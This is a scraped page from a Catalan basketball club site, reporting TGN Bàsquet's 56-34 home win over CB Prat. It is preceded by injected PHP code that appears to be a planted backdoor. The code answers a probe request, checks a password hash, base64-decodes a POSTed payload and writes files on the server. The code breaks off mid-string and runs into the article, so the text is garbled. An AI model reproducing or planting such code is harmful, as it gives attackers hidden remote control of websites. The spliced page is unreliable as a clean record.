function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN segueix sumant davant d'un Sagrat Cor ple - Tgn Bàsquet Club -

El TGN segueix sumant davant d’un Sagrat Cor ple

Updated: març 18, 2024

Partit corresponent a la vint-i-unena jornada de Supercopa Catalunya femenina, on el Sènior A ha rebut la visita del CB Prat, equip que arribava amb un balanç de 1 victoria i 19 derrotes.

El TGN Bàsquet era conscient de que s’enfrontava a un rival que sortiria a pista amb molt a guanyar i poc a perdre. I així va ser, el CB Prat va començar el partit amb gran intensitat, incomodant els atacs de l’equip entrenar per Israel Esteve. Al final dels primers 10 minuts la igualtat era total: 10-10 reflexava el marcador.

El segon quart va servir a les liles per assentar-se al partit i començar a imposar el seu joc, tancant la cistella en defensa i trobant bons llançaments en atac. Fruït d’aquests bons minuts del TGN Bàsquet, l’equip tarragoní es va situar 10 punts per sobre al marcador al minut 16 (23-13). Un parell de cistelles visitants i el primer dels 5 triples d’Andrea Sisniega van situar el 26-19 amb el que s’arribava a la conclusió de la primera meitat.

Després del pas pels vestuaris, l’igualtat va tornar a instal·lar-se a un Sagrat Cor ple d’aficionats/des i jugadors/es de la base del club, que van respondre a la crida del club omplint el pavelló i animant a l’equip. El CB Prat va aconseguir frenar l’empemta lila i es va mantenir viu al partit gràcies a una bona defensa en el tercer període, que acabava amb un resultat de 35-29 que feia pensar que el partit es mantindria igualat fins al final.

Però la versió més lluïda del TGN Bàsquet en atac es va veure a un últim quart estratosfèric. Quatre triples consecutius (3 de l’Andrea i 1 de la Sara Torruella) van noquejar a un impotent CB Prat, que només va poder anotar 5 punts en tot el període. El resultat final va ser de 56-34 i el TGN Bàsquet va anotar la 9a victòria de la temporada, celebrant-ho davant d’un Sagrat Cor pletòric.

A la propera jornada, el TGN rebrà la visita del CB Roser, el dissabte 6 d’abril a les 18:00h.